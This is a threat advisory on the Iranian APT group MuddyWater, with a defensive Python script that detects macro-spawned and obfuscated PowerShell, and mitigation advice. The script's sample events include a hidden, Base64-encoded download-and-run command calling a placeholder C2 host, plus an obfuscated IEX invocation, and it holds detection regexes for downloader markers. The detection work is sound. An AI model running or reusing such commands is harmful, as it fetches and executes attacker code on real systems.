Iranian Government-Sponsored APT Group Targets Government and Commercial Networks

Systems Networks
Advisory ID:
March 1, 2022


MuddyWater, an Iranian government-sponsored advanced persistent threat (APT) actor, has been observed conducting cyber espionage and other malicious cyber operations against government and private-sector organizations in Africa and other continents, including the telecommunications, defense, and oil and natural gas sectors and relevant government agencies. The group is also tracked as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros. It has been seen using spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks.

Description & Consequence

In its spearphishing campaigns, MuddyWater tries to coax the targeted user into downloading a ZIP file that contains either an Excel file with a malicious macro that communicates with the actor's command and control (C2) server, or a PDF file that drops a malicious file onto the victim's network. MuddyWater actors have also been observed exploiting publicly disclosed vulnerabilities and using open-source tools and techniques to gain access to sensitive data on victims' systems and to deploy ransomware. To maintain persistence on victim networks, the actors use techniques such as side-loading dynamic link libraries (DLLs), which tricks a legitimate program into running malware, and obfuscating PowerShell scripts to conceal C2 functions. The group also employs multiple malware sets, including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS, for loading malware, backdoor access, persistence, and exfiltration.
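The two detection opportunities in the spearphishing chain described above are (a) an Office application spawning a script host, and (b) a PowerShell command line that is Base64-encoded or carries common obfuscation markers. The following is an added example, not code from the original advisory or from any named product: a small Python triage script that runs those two checks over constructed process-creation events (the hypothetical parent/image/command-line record format, the sample events, and the hostname c2.example.invalid are all assumptions for illustration). It also decodes -EncodedCommand payloads, which PowerShell expects as Base64 over UTF-16LE text, so an analyst sees the real script rather than the blob.

```python
import base64
import re
from dataclasses import dataclass

# Office applications whose macros should not normally launch script hosts.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Script/living-off-the-land hosts commonly launched by malicious macros.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}

# PowerShell accepts abbreviated forms of -EncodedCommand; the payload is Base64.
ENCODED_ARG = re.compile(
    r"(?i)(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})")

# Heuristic obfuscation / downloader markers seen in command lines or decoded scripts.
OBFUSCATION_MARKERS = {
    "char_cast": re.compile(r"(?i)\[char\]\s*\d+"),
    "backtick_in_token": re.compile(r"[A-Za-z]`[A-Za-z]"),
    "string_join": re.compile(r"(?i)-join\b"),
    "base64_decode": re.compile(r"(?i)FromBase64String"),
    "invoke_expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "downloader": re.compile(r"(?i)Download(?:String|File)|Net\.WebClient|Invoke-WebRequest"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
}


@dataclass
class Event:
    """Hypothetical process-creation record (assumed format, not a product schema)."""
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    rule: str
    detail: str


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    findings = []
    parent, child = basename(event.parent_image), basename(event.image)
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        findings.append(Finding("office_spawns_script_host", f"{parent} -> {child}"))
    text = event.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append(Finding("encoded_command", decoded))
        text = text + "\n" + decoded          # scan the decoded script as well
    hits = sorted(name for name, rx in OBFUSCATION_MARKERS.items() if rx.search(text))
    if len(hits) >= 2:                        # one marker alone is too noisy
        findings.append(Finding("obfuscated_powershell", ", ".join(hits)))
    return findings


def scan(events):
    """Map event index -> findings, for events that triggered at least one rule."""
    results = {}
    for i, e in enumerate(events):
        f = analyze(e)
        if f:
            results[i] = f
    return results


def _encode(script):
    # Build a -EncodedCommand payload the way PowerShell expects it (Base64 of UTF-16LE).
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (assumed paths and a reserved .invalid hostname).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
MALICIOUS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
SAMPLE_EVENTS = [
    Event(r"C:\Windows\explorer.exe", EXCEL, r'"EXCEL.EXE" C:\Users\alice\Documents\budget.xlsx'),
    Event(EXCEL, PS, f"powershell.exe -nop -w hidden -enc {_encode(MALICIOUS_SCRIPT)}"),
    Event(r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile -Command Get-Service"),
    Event(r"C:\Windows\System32\svchost.exe", PS,
          'powershell.exe -w hidden -c "$s=[char]73+[char]69+[char]88; &(-join $s) $p"'),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {SAMPLE_EVENTS[idx].command_line[:60]}")
        for f in findings:
            print(f"  [{f.rule}] {f.detail}")
```

Only the second and fourth sample events fire: the Excel-spawned, hidden, encoded downloader trips all three rules, while the scheduled-task-style obfuscated command trips only the obfuscation rule. The two-marker threshold is deliberate; legitimate administration scripts routinely use a single marker such as -join or a hidden window, and the parent-process rule is what gives the macro case its confidence.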

When these intrusions succeed, the threat group gains unauthorized access to sensitive data, installs backdoors, maintains persistence on the victim's systems, and may then deploy ransomware. MuddyWater actors are well positioned to provide stolen data and network access to the Iranian government and to share it with other malicious cyber actors.


The following measures are recommended to guard against these threats:

  1. As email attachments and files downloaded via email links frequently contain executable code, use application control software to limit the applications and executable code that users can run. 
  2. Use multifactor authentication where possible, particularly for webmail, virtual private networks, and accounts that access critical systems. 
  3. Administrator privileges should be used sparingly. Users who browse the internet, use email, and execute code with administrator privileges are ideal spearphishing targets because their systems, once infected, allow attackers to move laterally across the network, gain additional access, and access highly sensitive information.
  4. Enable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. 
  5. Be wary of unsolicited email or social media contact from anyone you do not know personally. In these communications, do not click on hyperlinks or open attachments.
  6. Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.
  7. Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of user accounts exhibiting unusual activity.
  8. Use threat reputation services on network devices, operating systems, applications, and email services. Low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks can be detected and prevented using reputation services. 
  9. Install updates/patches for operating systems, software, and firmware as soon as they are available, prioritizing vulnerabilities that are known to be exploited.


